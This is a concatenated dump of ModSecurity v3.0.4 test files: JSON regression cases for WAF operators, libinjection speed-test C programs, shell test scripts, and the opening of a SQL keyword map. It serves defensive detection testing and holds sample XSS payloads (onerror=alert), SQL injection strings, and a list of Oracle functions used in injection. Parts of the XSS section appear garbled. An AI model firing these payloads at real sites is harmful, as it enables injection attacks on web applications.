Operator :: @verifycpf (1/2)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/", "method":"POST", "body": [ "param1=010.817.514-60¶m2=value2" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Added VerifyCPF match TX.0: 010.817.514-60" }, "rules":[ "SecRuleEngine On", "SecRule ARGS \"@verifycpf ^([0-9]{3}\\.){2}[0-9]{3}-[0-9]{2}$\" \"id:1,phase:2,capture,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/operator-verifycc.json0000644000175000017500000000200113607066010026245 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Operator :: @verifycc", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/", "method":"POST", "body": [ "param1=5484605089158216¶m2=value2" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Added VerifyCC match TX.0: 5484605089158216" }, "rules":[ "SecRuleEngine On", "SecRule ARGS \"@verifycc \\d{13,16}\" \"id:1,phase:2,capture,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/operator-validate-byte-range.json0000644000175000017500000000155513607066010030274 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Operator :: @validateByteRange with bytes > 127", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/%D0%A2%D0%B0%D1%80%D0%B0%D0%B1%D0%B0%D0%BD", "method":"GET", "body": [ ] }, "response":{ "headers":{}, "body":[ "no need." ] }, "expected":{ "debug_log":"Rule returned 0." }, "rules":[ "SecRuleEngine On", "SecRule REQUEST_URI \"@validateByteRange 37-102, 127-255\" \"id:1,phase:2,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/operator-rx.json0000644000175000017500000000400713607066010025074 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Operator :: @rx", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/", "method":"POST", "body": [ "param1=value1¶m2=value2" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Executing operator \"Rx" }, "rules":[ "SecRuleEngine On", "SecRule ARGS \"@rx (value1)\" \"id:1,phase:2,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Operator :: @rx in implicit form with negation ('!')", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/", "method":"HEAD", "body": [ ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Executing operator \"Rx\" with param \"\\^0\\$\"", "error_log":"Matched \"Operator `Rx' with parameter `\\^0\\$'" }, "rules":[ "SecRuleEngine On", "SecRule REQUEST_HEADERS:Content-Length \"!^0$\" \"id:1,phase:2,pass,t:trim,block\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/operator-pm.json0000644000175000017500000000616313607066010025064 0ustar zimmerlezimmerle[ { "enabled": 1, "version_min": 300000, "version_max": 0, "title": "pm operator test 1/4", "client": { "ip": "200.249.12.31", "port": 2313 }, "server": { "ip": "200.249.12.31", "port": 80 }, "request": { "headers": { "Host": "net.tutsplus.com" }, "uri": "\/test.pl?param1=something`somenthing", "method": "GET", "http_version": 1.1, "body": "" }, "response": { "headers": { "Content-Type": "text\/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" } }, "expected": { "debug_log": "Rule returned 1", "http_code": 500 }, "rules": [ "SecRuleEngine On", "SecRule ARGS \"@pm a ` b\" \"phase:1,id:999,deny,status:500\"" ] }, { "enabled": 1, "version_min": 300000, "version_max": 0, "title": "pm operater test 2/4", "client": { "ip": "200.249.12.31", "port": 2313 }, "server": { "ip": "200.249.12.31", "port": 80 }, "request": { "headers": { "Host": "net.tutsplus.com" }, "uri": "\/test.pl?param1=`somenthing", "method": "GET", "http_version": 1.1, "body": "" }, "response": { "headers": { "Content-Type": "text\/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" } }, "expected": { "debug_log": "", "http_code": 500 }, "rules": [ "SecRuleEngine On", "SecRule ARGS \"@pm a ` b\" \"phase:1,id:999,deny,status:500\"" ] }, { "enabled": 1, "version_min": 300000, "version_max": 0, "title": "pm operater test 3/4", "client": { "ip": "200.249.12.31", "port": 2313 }, "server": { "ip": "200.249.12.31", "port": 80 }, "request": { "headers": { "Host": "net.tutsplus.com" }, "uri": "\/test.pl?param1=a", "method": "GET", "http_version": 1.1, "body": "" }, "response": { "headers": { "Content-Type": "text\/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" } }, "expected": { "debug_log": "Rule returned 1", "http_code": 500 }, "rules": [ "SecRuleEngine On", "SecRule ARGS \"@pm a ` b\" \"phase:1,id:999,deny,status:500\"" ] }, { "enabled": 1, "version_min": 300000, "version_max": 0, "title": "pm operater test 4/4", "client": { "ip": "200.249.12.31", "port": 2313 }, "server": { "ip": "200.249.12.31", "port": 80 }, "request": { "headers": { "Host": "net.tutsplus.com" }, "uri": "\/test.pl?param1=a`b", "method": "GET", "http_version": 1.1, "body": "" }, "response": { "headers": { "Content-Type": "text\/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" } }, "expected": { "debug_log": "Rule returned 1", "http_code": 500 }, "rules": [ "SecRuleEngine On", "SecRule ARGS \"@pm a ` b\" \"phase:1,id:999,deny,status:500\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/operator-ipMatchFromFile.json0000644000175000017500000000641413607066010027460 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Operator :: @ipMatchFromFile", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/", "method":"POST", "body": [ "param1=value1¶m2=value2" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Rule returned 1" }, "rules":[ "SecRuleEngine On", "SecRule REMOTE_ADDR \"@ipMatchFromFile test-cases\/data\/ipMatchFromFile.txt\" \"id:1,phase:3,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Operator :: @ipMatchFromFile - file not found", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/", "method":"POST", "body": [ "param1=value1¶m2=value2" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "parser_error":"Rules error. File: operator-ipMatchFromFile.json. Line: 2. Column: 19. Looking at: 'file-not-found.txt', 'file-not-found.txt', 'operator-ipMatchFromFile.json/file-not-found.txt', 'operator-ipMatchFromFile.json/file-not-found.txt'." }, "rules":[ "SecRuleEngine On", "SecRule REMOTE_ADDR \"@ipMatchFromFile file-not-found.txt\" \"id:1,phase:3,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "resource": "curl", "title":"Testing Operator :: @ipMatchFromFile - https", "client":{ "ip":"8.8.4.4", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/", "method":"POST", "body": [ "param1=value1¶m2=value2" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Rule returned 1." }, "rules":[ "SecRuleEngine On", "SecRule REMOTE_ADDR \"@ipMatchFromFile https://www.modsecurity.org/modsecurity-regression-test.txt\" \"id:1,phase:3,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/operator-inpectFile.json0000644000175000017500000002133513607066010026530 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Operator :: @inspectFile (1/3)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/whee?res=1", "method":"GET", "body": [ ] }, "response":{ "headers":{}, "body":[ "no need." ] }, "expected":{ "debug_log":"Rule returned 0." }, "rules":[ "SecRuleEngine On", "SecRule ARGS:res \"@inspectFile /bin/echo\" \"id:1,phase:2,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Operator :: @inspectFile (2/3)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/whee?res=0", "method":"GET", "body": [ ] }, "response":{ "headers":{}, "body":[ "no need." ] }, "expected":{ "debug_log":"Rule returned 1." }, "rules":[ "SecRuleEngine On", "SecRule ARGS:res \"@inspectFile /bin/echo\" \"id:1,phase:2,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Operator :: @inspectFile (3/3)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/whee?res=whee", "method":"GET", "body": [ ] }, "response":{ "headers":{}, "body":[ "no need." ] }, "expected":{ "debug_log":"Rule returned 1." }, "rules":[ "SecRuleEngine On", "SecRule ARGS:res \"@inspectFile /bin/echo\" \"id:1,phase:2,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "resource":"lua", "title":"Testing Operator :: @inspectFile - lua (1/7)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/whee?res=whee", "method":"GET", "body": [ ] }, "response":{ "headers":{}, "body":[ "no need." ] }, "expected":{ "debug_log":"Rule returned 1." }, "rules":[ "SecRuleEngine On", "SecRule ARGS:res \"@inspectFile test-cases/data/match.lua\" \"id:1,phase:2,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "resource":"lua", "title":"Testing Operator :: @inspectFile - lua (2/7)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/whee?res=whee", "method":"GET", "body": [ ] }, "response":{ "headers":{}, "body":[ "no need." ] }, "expected":{ "debug_log":"echo 123" }, "rules":[ "SecRuleEngine On", "SecRule ARGS:res \"@inspectFile test-cases/data/match-log.lua\" \"id:1,phase:2,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "resource":"lua", "title":"Testing Operator :: @inspectFile - lua (3/7)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/whee?res=whee", "method":"GET", "body": [ ] }, "response":{ "headers":{}, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"whee\" " }, "rules":[ "SecRuleEngine On", "SecRule ARGS:res \"@inspectFile test-cases/data/match-set.lua\" \"id:1,phase:2,pass,t:trim\"", "SecRule TX:test \"whee\" \"id:2,phase:2,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "resource":"lua", "title":"Testing Operator :: @inspectFile - lua (4/7)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/whee?res=whee", "method":"GET", "body": [ ] }, "response":{ "headers":{}, "body":[ "no need." ] }, "expected":{ "debug_log":"Number is bigger than one." }, "rules":[ "SecRuleEngine On", "SecRule ARGS \".\" \"id:2,phase:2,setvar:tx.test=2\"", "SecRule ARGS:res \"@inspectFile test-cases/data/match-getvar.lua\" \"id:1,phase:2,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "resource":"lua", "title":"Testing Operator :: @inspectFile - lua (5/7)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/whee?res=whee&z=z&d=e", "method":"GET", "body": [ ] }, "response":{ "headers":{}, "body":[ "no need." ] }, "expected":{ "debug_log":"Z: \\{ \\[1\\] = \\{ \\[\"" }, "rules":[ "SecRuleEngine On", "SecRule QUERY_STRING \".\" \"id:2,phase:2,setvar:tx.test=2\"", "SecRule ARGS:res \"@inspectFile test-cases/data/match-getvars.lua\" \"id:1,phase:2,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "resource":"lua", "title":"Testing Operator :: @inspectFile - lua (6/7)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/whee?res=whee&z=z&d=e", "method":"GET", "body": [ ] }, "response":{ "headers":{}, "body":[ "no need." ] }, "expected":{ "debug_log":"Just fine." }, "rules":[ "SecRuleEngine On", "SecRule QUERY_STRING \".\" \"id:2,phase:2,setvar:tx.test=FELIPE\"", "SecRule QUERY_STRING \"@inspectFile test-cases/data/match-getvar-transformation.lua\" \"id:1,phase:2,pass\"" ] }, { "enabled":1, "version_min":300000, "resource":"lua", "title":"Testing Operator :: @inspectFile - lua (7/7)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/whee?res=whee&z=z&d=e", "method":"GET", "body": [ ] }, "response":{ "headers":{}, "body":[ "no need." ] }, "expected":{ "debug_log":"Whee. Working like a charm. That is what we have: FELIPE" }, "rules":[ "SecRuleEngine On", "SecRule QUERY_STRING \".\" \"id:2,phase:2,setvar:tx.test=FeLiPe\"", "SecRule QUERY_STRING \"@inspectFile test-cases/data/match-getvar-multi-transformations.lua\" \"id:1,phase:2,pass\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/operator-fuzzyhash.json0000644000175000017500000001625313607066010026504 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "resource":"ssdeep", "title":"Testing Operator :: @fuzzyHash (1/2)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/", "method":"POST", "body": [ "", "# -- Rule engine initialization ----------------------------------------------", "", "# Enable ModSecurity, attaching it to every transaction. Use detection", "# only to start with, because that minimises the chances of post-installation", "# disruption.", "#", "SecRuleEngine DetectionOnly", "", "", "# -- Request body handling ---------------------------------------------------", "", "# Allow ModSecurity to access request bodies. If you don't, ModSecurity", "# won't be able to see any POST parameters, which opens a large security", "# hole for attackers to exploit.", "#", "SecRequestBodyAccess On", "", "", "# Enable XML request body parser.", "# Initiate XML Processor in case of xml content-type", "#", "SecRule REQUEST_HEADERS:Content-Type \"text/xml\" \\", " \"id:'200000',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=XML\"", "", "# Enable JSON request body parser.", "# Initiate JSON Processor in case of JSON content-type; change accordingly", "# if your application does not use 'application/json'", "#", "SecRule REQUEST_HEADERS:Content-Type \"application/json\" \\", " \"id:'200001',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=JSON\"", "", "# Maximum request body size we will accept for buffering. If you support", "# file uploads then the value given on the first line has to be as large", "# as the largest file you are willing to accept. The second value refers", "# to the size of data, with files excluded. You want to keep that value as", "# low as practical.", "#", "SecRequestBodyLimit 13107200", "SecRequestBodyNoFilesLimit 131072", "", "# Store up to 128 KB of request body data in memory. When the multipart", "# parser reachers this limit, it will start using your hard disk for", "# storage. That is slow, but unavoidable.", "#", "SecRequestBodyInMemoryLimit 131072", "", "# What do do if the request body size is above our configured limit.", "# Keep in mind that this setting will automatically be set to ProcessPartial", "# when SecRuleEngine is set to DetectionOnly mode in order to minimize", "# disruptions when initially deploying ModSecurity.", "#", "SecRequestBodyLimitAction Reject", "", "# Verify that we've correctly processed the request body.", "# As a rule of thumb, when failing to process a request body", "# you should reject the request (when deployed in blocking mode)", "# or log a high-severity alert (when deployed in detection-only mode).", "#", "SecRule REQBODY_ERROR \"!\\@eq 0\" ", "\"id:'200002', phase:2,t:none,log,deny,status:400,msg:'Failed to parse request body.',logdata:'%{reqbody_error_msg}',severity:2\"", " " ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":" Fuzzy hash: matched with score: 54." }, "rules":[ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRule REQUEST_BODY \"@fuzzyHash test-cases/data/ssdeep.txt 1\" \"id:1,phase:2,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "resource":"ssdeep", "title":"Testing Operator :: @fuzzyHash (2/2)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/", "method":"POST", "body": [ "", "# -- Rule engine initialization ----------------------------------------------", "", "# Enable ModSecurity, attaching it to every transaction. Use detection", "# only to start with, because that minimises the chances of post-installation", "# disruption.", "#", "SecRuleEngine DetectionOnly", "", "", "# -- Request body handling ---------------------------------------------------", "", "# Allow ModSecurity to access request bodies. If you don't, ModSecurity", "# won't be able to see any POST parameters, which opens a large security", "# hole for attackers to exploit.", "#", "SecRequestBodyAccess On", "", "", "# Enable XML request body parser.", "# Initiate XML Processor in case of xml content-type", "#", "SecRule REQUEST_HEADERS:Content-Type \"text/xml\" \\", " \"id:'200000',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=XML\"", "", "# Enable JSON request body parser.", "# Initiate JSON Processor in case of JSON content-type; change accordingly", "# if your application does not use 'application/json'", "#", "SecRule REQUEST_HEADERS:Content-Type \"application/json\" \\", " \"id:'200001',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=JSON\"", "", "# Maximum request body size we will accept for buffering. If you support", "# file uploads then the value given on the first line has to be as large", "# as the largest file you are willing to accept. The second value refers", "# to the size of data, with files excluded. You want to keep that value as", "# low as practical.", "#", "SecRequestBodyLimit 13107200", "SecRequestBodyNoFilesLimit 131072", "", "# Store up to 128 KB of request body data in memory. When the multipart", "# parser reachers this limit, it will start using your hard disk for", "# storage. That is slow, but unavoidable.", "#", "SecRequestBodyInMemoryLimit 131072", "", "# What do do if the request body size is above our configured limit.", "# Keep in mind that this setting will automatically be set to ProcessPartial", "# when SecRuleEngine is set to DetectionOnly mode in order to minimize", "# disruptions when initially deploying ModSecurity.", "#", "SecRequestBodyLimitAction Reject", "", "# Verify that we've correctly processed the request body.", "# As a rule of thumb, when failing to process a request body", "# you should reject the request (when deployed in blocking mode)", "# or log a high-severity alert (when deployed in detection-only mode).", "#", "SecRule REQBODY_ERROR \"!\\@eq 0\" ", "\"id:'200002', phase:2,t:none,log,deny,status:400,msg:'Failed to parse request body.',logdata:'%{reqbody_error_msg}',severity:2\"", " " ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Rule returned 0." }, "rules":[ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRule REQUEST_BODY \"@fuzzyHash test-cases/data/ssdeep.txt 100\" \"id:1,phase:2,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/operator-detectxss.json0000644000175000017500000000177713607066010026464 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Operator :: @detectXSS", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/", "method":"POST", "body": [ "param1=", ">" "x >", "' >", "\">", "red;", "red;}", "red;\"/>", "');}", "onerror=alert(1)>", "x onerror=alert(1);>", "x' onerror=alert(1);>", "x\" onerror=alert(1);>", "", "", "", "", "", "", "123 LIKE -1234.5678E+2;", "APPLE 19.123 'FOO' \"BAR\"", "/* BAR */ UNION ALL SELECT (2,3,4)", "1 || COS(+0X04) --FOOBAR", "dog apple @cat banana bar", "dog apple cat \"banana \'bar", "102 TABLE CLOTH", "(1001-'1') union select 1,2,3,4 from credit_cards", NULL }; const int imax = 1000000; int i, j; size_t slen; clock_t t0,t1; double total; int tps; t0 = clock(); for (i = imax, j=0; i != 0; --i, ++j) { if (s[j] == NULL) { j = 0; } slen = strlen(s[j]); libinjection_xss(s[j], slen); } t1 = clock(); total = (double) (t1 - t0) / (double) CLOCKS_PER_SEC; tps = (int)((double) imax / total); return tps; } int main() { const int mintps = 500000; int tps = testIsSQL(); printf("\nTPS : %d\n\n", tps); if (tps < 500000) { printf("FAIL: %d < %d\n", tps, mintps); /* FAIL */ return 1; } else { printf("OK: %d > %d\n", tps, mintps); /* OK */ return 0; } } modsecurity-v3.0.4/others/libinjection/src/test_speed_sqli.c0000644000175000017500000000273213607066311024613 0ustar zimmerlezimmerle/* * A not very good test for performance. This is mostly useful in * testing performance -regressions- * */ #include #include #include #include "libinjection.h" #include "libinjection_sqli.h" int testIsSQL(void); int testIsSQL(void) { const char* const s[] = { "123 LIKE -1234.5678E+2;", "APPLE 19.123 'FOO' \"BAR\"", "/* BAR */ UNION ALL SELECT (2,3,4)", "1 || COS(+0X04) --FOOBAR", "dog apple @cat banana bar", "dog apple cat \"banana \'bar", "102 TABLE CLOTH", "(1001-'1') union select 1,2,3,4 from credit_cards", NULL }; const int imax = 1000000; int i, j; size_t slen; sfilter sf; clock_t t0,t1; double total; int tps; t0 = clock(); for (i = imax, j=0; i != 0; --i, ++j) { if (s[j] == NULL) { j = 0; } slen = strlen(s[j]); libinjection_sqli_init(&sf, s[j], slen, FLAG_QUOTE_NONE | FLAG_SQL_ANSI); libinjection_is_sqli(&sf); } t1 = clock(); total = (double) (t1 - t0) / (double) CLOCKS_PER_SEC; tps = (int)((double) imax / total); return tps; } int main() { const int mintps = 450000; int tps = testIsSQL(); printf("\nTPS : %d\n\n", tps); if (tps < mintps) { printf("FAIL: %d < %d\n", tps, mintps); /* FAIL */ return 1; } else { printf("OK: %d > %d\n", tps, mintps); /* OK */ return 0; } } modsecurity-v3.0.4/others/libinjection/src/test-unit.sh0000755000175000017500000000014113607066311023543 0ustar zimmerlezimmerle#!/bin/sh set -e cd ../tests pwd find . -name 'test*.txt' | xargs ${VALGRIND} ../src/testdriver modsecurity-v3.0.4/others/libinjection/src/test-speed-xss.sh0000755000175000017500000000005413607066311024502 0ustar zimmerlezimmerle#!/bin/sh set -e ${VALGRIND} ./testspeedxss modsecurity-v3.0.4/others/libinjection/src/test-speed-sqli.sh0000755000175000017500000000005513607066311024636 0ustar zimmerlezimmerle#!/bin/sh set -e ${VALGRIND} ./testspeedsqli modsecurity-v3.0.4/others/libinjection/src/test-samples-xss-positive.sh0000755000175000017500000000013113607066311026702 0ustar zimmerlezimmerle#!/bin/sh # # XSS Sample Tests # set -e ${VALGRIND} ./reader -t -i -x -m 18 ../data/xss* modsecurity-v3.0.4/others/libinjection/src/test-samples-sqli-positive.sh0000755000175000017500000000013513607066311027041 0ustar zimmerlezimmerle#!/bin/sh # # XSS Sample Tests # set -e ${VALGRIND} ./reader -q -i -m 18 ../data/sqli-*.txt modsecurity-v3.0.4/others/libinjection/src/test-samples-sqli-negative.sh0000755000175000017500000000012713607066311027002 0ustar zimmerlezimmerle#!/bin/sh # # XSS Sample Tests # set -e ${VALGRIND} ./reader -m 21 ../data/false_*.txt modsecurity-v3.0.4/others/libinjection/src/test-driver.sh0000755000175000017500000000027513607066311024067 0ustar zimmerlezimmerle#!/bin/sh set -u TEST=$1 LOG="${TEST}.log" rm -f $LOG "./$TEST" >$LOG 2>&1 aexit=$? if [ "$aexit" -eq "0" ]; then echo "PASS: $TEST" else echo "FAIL: $TEST" cat $LOG exit 1 fi modsecurity-v3.0.4/others/libinjection/src/test-cppcheck.sh0000755000175000017500000000042113607066311024345 0ustar zimmerlezimmerle#!/bin/sh CPPCHECK=cppcheck CPPCHECK_FLAGS=--quiet --enable=all --inconclusive --error-exitcode=2 \ --std=c89 --std=posix --std=c++11 \ --suppress=variableScope \ --template '{file}:{line} {severity} {id} {message}' ${CPPCHECK} ${CPPCHECK_FLAGS} modsecurity-v3.0.4/others/libinjection/src/sqlparse_map.py0000755000175000017500000013640013607066311024324 0ustar zimmerlezimmerle#!/usr/bin/env python # pylint: disable=C0301,C0302 # Turn off line-too-long, and too-many-lines warnings # # Copyright 2012, 2013 Nick Galbreath # nickg@client9.com # BSD License -- see COPYING.txt for details # """ Data for libinjection. These are simple data structures which are exported to JSON. This is done so comments can be added to the data directly (JSON doesn't support comments). """ KEYWORDS = { '_BIG5': 't', '_DEC8': 't', '_CP850': 't', '_HP8': 't', '_KOI8R': 't', '_LATIN1': 't', '_LATIN2': 't', '_SWE7': 't', '_ASCII': 't', '_UJIS': 't', '_SJIS': 't', '_HEBREW': 't', '_TIS620': 't', '_EUCKR': 't', '_KOI8U': 't', '_GB2312': 't', '_GREEK': 't', '_CP1250': 't', '_GBK': 't', '_LATIN5': 't', '_ARMSCII8': 't', '_UTF8': 't', '_USC2': 't', '_CP866': 't', '_KEYBCS2': 't', '_MACCE': 't', '_MACROMAN': 't', '_CP852': 't', '_LATIN7': 't', '_CP1251': 't', '_CP1257': 't', '_BINARY': 't', '_GEOSTD8': 't', '_CP932': 't', '_EUCJPMS': 't', 'AUTOINCREMENT' : 'k', 'UTL_INADDR.GET_HOST_ADDRESS': 'f', 'UTL_INADDR.GET_HOST_NAME' : 'f', 'UTL_HTTP.REQUEST' : 'f', # ORACLE # http://blog.red-database-security.com/ # /2009/01/17/tutorial-oracle-sql-injection-in-webapps-part-i/print/ 'DBMS_PIPE.RECEIVE_MESSAGE': 'f', 'CTXSYS.DRITHSX.SN': 'f', 'SYS.STRAGG': 'f', 'SYS.FN_BUILTIN_PERMISSIONS' : 'f', 'SYS.FN_GET_AUDIT_FILE' : 'f', 